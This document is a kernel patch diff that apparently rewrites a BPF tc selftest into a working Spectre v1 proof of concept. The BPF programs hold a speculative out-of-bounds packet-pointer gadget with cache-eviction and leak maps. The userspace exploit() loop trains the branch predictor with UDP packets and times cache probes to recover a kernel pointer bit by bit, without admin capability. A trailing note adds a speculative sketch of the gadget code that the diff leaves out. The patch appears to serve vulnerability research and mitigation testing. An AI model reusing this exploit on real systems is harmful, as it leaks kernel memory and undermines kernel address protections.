diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 382c7a71f81f2d4ce63d3321e584e7ea3cd9218e..ef36ebca3b1123de8309889838e024cd5212b741 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -99,6 +99,28 @@ TC_INDIRECT_SCOPE int cls_bpf_classify(struct sk_buff *skb,
 		__skb_push(skb, skb->mac_len);
 		bpf_compute_data_pointers(skb);
 		filter_res = bpf_prog_run(prog->filter, skb);
+
+#if 0
+		// Print after the program has run so as not to disturb the cache.
+		static atomic_t init = ATOMIC_INIT(0);
+		if (unlikely(skb_headlen(skb) == 170 && atomic_inc_return(&init) == 1)) {
+			barrier_nospec();
+			struct bpf_skb_data_end *cb = (struct bpf_skb_data_end *)skb->cb;
+			pr_err_ratelimited(
+				"skb = %px, skb_headlen(skb) = %d\n"
+				"data *(%px) = %px\n"
+				"data_end *(%px) = %px\n"
+				"kernel skb_shinfo(skb)->frags[0].bv_page\n\t*(%px ?= data+366 = %px) = %px\n",
+				skb, skb_headlen(skb),
+				&(skb->data), skb->data,
+				&(cb->data_end), cb->data_end,
+				&skb_shinfo(skb)->frags[0].bv_page,
+				((char *) skb->data) + 366,
+				skb_shinfo(skb)->frags[0].bv_page
+			);
+		}
+#endif
+
 		__skb_pull(skb, skb->mac_len);
 	} else {
 		bpf_compute_data_pointers(skb);
diff --git a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
old mode 100644
new mode 100755
index 48b55539331ee54130aa37e2b6103634d24c4d10..ec82e95895b52bdb12e320e8d2e6094c85f1537d
--- a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
+++ b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
@@ -2,6 +2,8 @@
 
 #include <test_progs.h>
 #include <linux/pkt_cls.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
 #include "cap_helpers.h"
 #include "test_tc_bpf.skel.h"
 
@@ -395,6 +397,251 @@ void tc_bpf_root(void)
 	test_tc_bpf__destroy(skel);
 }
 
+static void die(char *s)
+{
+	perror(s);
+	exit(1);
+}
+
+#define SERVER "127.0.0.1"
+#define BUFLEN (128 * 1024)
+#define PORT 8888
+
+static int client(struct sockaddr_in *si_other) {
+	static int s = -1;
+	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+		die("socket");
+	}
+
+	memset((char *) si_other, 0, sizeof(*si_other));
+	si_other->sin_family = AF_INET;
+	si_other->sin_port = htons(PORT);
+
+	if (inet_aton(SERVER, &si_other->sin_addr) == 0) {
+		fprintf(stderr, "inet_aton() failed\n");
+		exit(1);
+	}
+
+	return s;
+}
+
+static int server(void) {
+	struct sockaddr_in si_me;
+	int s;
+
+	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+		die("socket");
+	}
+
+	memset((char *) &si_me, 0, sizeof(si_me));
+
+	si_me.sin_family = AF_INET;
+	si_me.sin_port = htons(PORT);
+	si_me.sin_addr.s_addr = htonl(INADDR_ANY);
+
+	if (bind(s, (struct sockaddr *) &si_me, sizeof(si_me)) == -1) {
+		die("bind");
+	}
+
+	return s;
+}
+
+static int client_ping(int s, struct sockaddr_in *si_other, size_t n) {
+	unsigned int slen = sizeof(*si_other);
+	static char message[BUFLEN] = {};
+	memset(message, 0x37, n);
+
+	if (sendto(s, message, n, 0, (struct sockaddr *) si_other, slen) == -1) {
+		die("sendto()");
+	}
+
+	return 0;
+}
+
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+
+#define EI_MASK(BYTE, MASK) \
+	else if (offset == BYTE && mask == MASK) fd = bpf_program__fd(skel->progs.NAME(BYTE, MASK));
+
+#define EI_BYTE(BYTE) \
+	EI_MASK(BYTE, 1) \
+	EI_MASK(BYTE, 2) \
+	EI_MASK(BYTE, 4) \
+	EI_MASK(BYTE, 8) \
+	EI_MASK(BYTE, 16) \
+	EI_MASK(BYTE, 32) \
+	EI_MASK(BYTE, 64) \
+	EI_MASK(BYTE, 128)
+
+static int exploit(struct test_tc_bpf *skel, long long *skipped, long long *total,
+		   long long *t0, long long *t1, int offset, int mask) {
+	DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook, .ifindex = LO_IFINDEX, .attach_point = BPF_TC_INGRESS);
+
+	int fd;
+	if (offset == 350 && mask == 1) fd = bpf_program__fd(skel->progs.pkt_ptr_350_1);
+	EI_BYTE(366)
+	EI_BYTE(367)
+	EI_BYTE(368)
+	EI_BYTE(369)
+	EI_BYTE(370)
+	EI_BYTE(371)
+	EI_BYTE(372)
+	EI_BYTE(373)
+	else {
+		errno = EINVAL;
+		die("mask/offset");
+	}
+
+	DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts, .prog_fd = fd);
+	int ret;
+
+	ret = bpf_tc_hook_create(&hook);
+	ret = ret == -EEXIST ? 0 : ret;
+	if (ret) {
+		errno = -ret;
+		perror("hook create");
+		if (!ASSERT_OK(ret, "bpf_tc_hook_create(BPF_TC_INGRESS)"))
+			goto destroy;
+	}
+
+	ret = bpf_tc_attach(&hook, &opts);
+	if (ret)
+		if (!ASSERT_OK(ret, "bpf_tc_attach"))
+			goto end;
+
+	int ss = server();
+	struct sockaddr_in si_server;
+	int cs = client(&si_server);
+
+	client_ping(cs, &si_server, 16 * 1024); // make it set bv_page != 0
+
+#define LEAKMAP_ENTRIES (5 * 512)
+
+	for (__u32 i = 0; i < LEAKMAP_ENTRIES; i += 512) {
+		__u32 key = i;
+		__s64 value = -i;
+		ret = bpf_map__update_elem(skel->maps.leakmap,
+					   &key, sizeof(key),
+					   &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_leak"))
+				goto end;
+		}
+	}
+
+// for a 128 KiB L1d, 90 MiB L3, 1536-entry STLB
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+	for (__u32 i = 0; i < EVICTMAP_ENTRIES; i += 8) {
+		__u32 index = i / 8;
+		__u32 key = i + (index % 8);
+		__u64 value = i;
+		ret = bpf_map__update_elem(skel->maps.evictmap, &key, sizeof(key), &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_evict"))
+				goto end;
+		}
+	}
+
+	long long n = 0;
+#define T 8
+#define N 8
+	long long i;
+	for (i = 0; n < N; i++) {
+		// Branch prediction using the PHT will be wrong unless it knows rand().
+		int t = rand() % T;
+		for (int j = 0; j < t; j++) {
+			client_ping(cs, &si_server, 512);
+		}
+		client_ping(cs, &si_server, 128); // + 42 byte header
+
+#define X 4
+		__s64 delta[X];
+		for (size_t j = 0; j < X; j++) {
+			__u32 key[X] = {0, 512, 1536, 1024};
+			ret = bpf_map__lookup_elem(skel->maps.leakmap, &key[j], sizeof(key[j]),
+						   &delta[j], sizeof(delta[j]), 0);
+			if (ret) {
+				if (!ASSERT_OK(ret, "delta lookup"))
+					goto end;
+			}
+			if (delta[j] <= 0) {
+				ASSERT_OK(-1, "delta not written by bpf program");
+			}
+		}
+
+		__u32 key = 2048;
+		__u64 err;
+		ret = bpf_map__lookup_elem(skel->maps.leakmap, &key, sizeof(key), &err, sizeof(err), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "err lookup"))
+				goto end;
+		}
+		static bool first = true;
+		if (err && first) {
+			first = false;
+			ASSERT_OK(-err, "bpf");
+		}
+
+		if (i == 2 * 2 * N) {
+			// reload and retry
+			ret = -1;
+			// fprintf(stderr, "i: timeout after %lld reps\n", i);
+			break;
+		}
+
+		// sometimes everything is still in the cache
+		if (!(delta[3] < delta[2])) {
+			// fprintf(stderr, "skip: uncached\t%lld, cached\t%lld, 0\t%lld, 1\t%lld\n", delta[2], delta[3], delta[0], delta[1]);
+			continue;
+		}
+
+		if (delta[0] > delta[1])
+			*t0 += 1000;
+		else
+			*t1 += 1000;
+		n++;
+	}
+
+	*skipped += i - n;
+	*total += i;
+
+	if (n > 0) {
+		*t0 /= n;
+		*t1 /= n;
+	}
+
+	__u32 key = 0;
+	__u64 value;
+	int ret2 = bpf_map__lookup_elem(skel->maps.evictmap,
+					&key, sizeof(key),
+					&value, sizeof(value), 0);
+	if (ret2) {
+		if (!ASSERT_OK(ret2, "lookup"))
+			goto end;
+	}
+	if (value > i * T) {
+		ASSERT_OK(-1, "BUG value > i*T");
+		goto end;
+	}
+
+end:
+	close(ss);
+	close(cs);
+
+	opts.prog_fd = opts.prog_id = 0;
+	ret2 = bpf_tc_detach(&hook, &opts);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_detach");
+
+destroy:
+	ret2 = bpf_tc_hook_destroy(&hook);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_hook_destroy");
+
+	return ret;
+}
+
 void tc_bpf_non_root(void)
 {
 	struct test_tc_bpf *skel = NULL;
@@ -409,11 +656,90 @@ void tc_bpf_non_root(void)
 	if (!ASSERT_OK(ret, "disable_cap_sys_admin"))
 		goto restore_cap;
 
-	skel = test_tc_bpf__open_and_load();
-	if (!ASSERT_OK_PTR(skel, "test_tc_bpf__open_and_load"))
-		goto restore_cap;
+	libbpf_set_print(NULL);
+
+#define O 1
+	for (int k = 0; k < O; k++) { // to test reproducibility
+
+		// Must match the generated pkt_ptr programs in test_tc_bpf.c and the
+		// exploit() function.
+		__u64 base_byte = 366;
+
+		long long skipped = 0;
+		long long total = 0;
+		long long bad_loads = 0;
+		long long total_loads = 0;
+		__u64 qw = 0;
+
+		for (__u64 byte = 0; byte < 8; byte++) {
+			for (__u64 bit = 0; bit < 8; bit++) {
+
+				long long dmax = INT_MIN;
+				long long dmin = INT_MAX;
+				long long d = 0;
+				long long m = 0;
+#define M 8
+				int j = 0;
+				for (j = 0; true; j++) {
+					total_loads += 1;
+					skel = test_tc_bpf__open_and_load();
+					if (skel) {
+						long long t0 = 0, t1 = 0;
+
+						ret = exploit(skel,
+							      &skipped, &total,
+							      &t0, &t1,
+							      base_byte + byte, 1 << bit);
+						if (ret == -1) {
+							bad_loads += 1;
+							goto cleanup;
+						}
+						if (ret)
+							if (!ASSERT_OK(ret, "exploit"))
+								goto restore_cap;
+
+						if (j == 0) {
+							goto cleanup;
+						}
+
+						long long jd = t0 - t1;
+						dmax = jd > dmax ? jd : dmax;
+						dmin = jd < dmin ? jd : dmin;
+						d += jd;
+						m++;
+					}
+cleanup:
+					test_tc_bpf__destroy(skel);
+
+					if (j == 64 * M) {
+						fprintf(stderr, "failed to read bit accurately because of too many consecutive bad loads or an inconclusive result, continuing anyway\n");
+						break;
+					}
+
+					// Continue as long as the result is inconclusive.
+					if (m >= M && (d / m >= 200 || d / m <= -200)) {
+						break;
+					}
+				}
+
+				d /= m;
+
+				fprintf(stderr, "*(data+%lld):%lld = %lld < avg %lld < %lld (ps), j = %d\n", base_byte + byte, bit, dmin, d, dmax, j);
+
+				// little endian
+				__u64 b = !!(d < 0 ? 0 : 1);
+				qw |= b << ((byte * 8) + bit);
+			}
+		}
+		fprintf(stderr, "userspace guess for *(u64 *)(data+%lld = data_end+%lld) = 0x%llx\n"
+			"\t>%lld percent bad samples; %lld percent bad loads\n",
+			base_byte, base_byte - 42 - 128, qw,
+			(skipped * 100) / total,
+			(bad_loads * 100) / total_loads);
 
-	test_tc_bpf__destroy(skel);
+	}
+
+	ASSERT_OK(-1, "exploit");
 
 restore_cap:
 	if (caps)
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf.c b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
old mode 100644
new mode 100755
index ef7da419632a2146be37e8a1d271e5d4ac87af29..c5344255ce88eb43241ae4ac6d019e14f03b9b97
--- a/tools/testing/selftests/bpf/progs/test_tc_bpf.c
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
@@ -4,6 +4,7 @@
 #include <bpf/bpf_helpers.h>
 #include <linux/if_ether.h>
 #include <linux/ip.h>
+#include "bpf_misc.h"
 
 /* Dummy prog to test TC-BPF API */
 
@@ -13,13 +14,74 @@ int cls(struct __sk_buff *skb)
 	return 0;
 }
 
-/* Prog to verify tc-bpf without cap_sys_admin and cap_perfmon */
-SEC("tcx/ingress")
-int pkt_ptr(struct __sk_buff *skb)
-{
-	struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr);
+/* pkt-ptr-based Spectre v1 gadget */
 
-	if ((long)(iph + 1) > (long)skb->data_end)
-		return 1;
-	return 0;
+#define LEAKMAP_ENTRIES (5 * 512)
+
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, LEAKMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} leakmap SEC(".maps");
+
+#define L1_SIZE_KiB 128
+#define SIZEOF_CACHELINE 64
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, EVICTMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} evictmap SEC(".maps");
+
+static long callback_fn(__u32 index, void *ctx) {
+	// sizeof(__u64) * 8 is one 64-byte cacheline
+	__u32 key = index * 8 + (index % 8);
+	__u64 *value = bpf_map_lookup_elem(&evictmap, &key);
+	if (value) {
+		*value += 1;
+		return 0;
+	}
+	return 1;
 }
+
+#define STRINGIFY(x) #x
+#define TOSTRING(x) STRINGIFY(x)
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+
+#define OFFSET 350
+#define MASK 1
+#include "test_tc_bpf_pkt_ptr.h"
+#undef OFFSET
+#undef MASK
+
+// 366 = PAYLOAD + 42 + 196 with PAYLOAD=128
+#define OFFSET 366
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 367
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 368
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 369
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 370
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 371
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 372
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 373
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+
+char LICENSE[] SEC("license") = "GPL";
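
Not part of the patch: test_tc_bpf_pkt_ptr.h and test_tc_bpf_pkt_ptr_byte.h are #include'd above but are not contained in this diff. For orientation only, one generated pkt_ptr_<OFFSET>_<MASK> program could plausibly look like the sketch below. The section name, the NAME()/OFFSET/MASK macros, callback_fn, leakmap and evictmap are taken from this patch; the body, the bpf_loop() eviction pass and the probe keys are assumptions, not the contents of the real headers.

/* HYPOTHETICAL sketch only -- not the actual test_tc_bpf_pkt_ptr*.h. */
SEC("tcx/ingress")
int NAME(OFFSET, MASK)(struct __sk_buff *skb)
{
	void *data = (void *)(long)skb->data;
	void *data_end = (void *)(long)skb->data_end;

	/* Walk evictmap to push leakmap and the skb data out of the caches. */
	bpf_loop(EVICTMAP_ENTRIES / 8, callback_fn, NULL, 0);

	/* For the short 128-byte probe packet this bounds check fails
	 * architecturally (OFFSET lies past data_end), but the PHT has been
	 * trained by the preceding 512-byte packets to fall through, so the
	 * out-of-bounds load below can execute transiently.
	 */
	if (data + OFFSET + 1 > data_end)
		return 0;

	__u8 secret = *(__u8 *)(data + OFFSET);
	/* Hypothetical probe slots: touch one of two distinct cache lines
	 * depending on the leaked bit.
	 */
	__u32 key = (secret & MASK) ? 512 : 0;
	__u64 *slot = bpf_map_lookup_elem(&leakmap, &key);
	if (slot)
		*slot += 1;

	return 0;
}

The real generated programs presumably also time the probe loads themselves and report the latencies back through leakmap (keys 0, 512, 1024, 1536, plus an error code at 2048), since that is what the exploit() loop in prog_tests/tc_bpf.c reads out; that measurement code is omitted from this sketch.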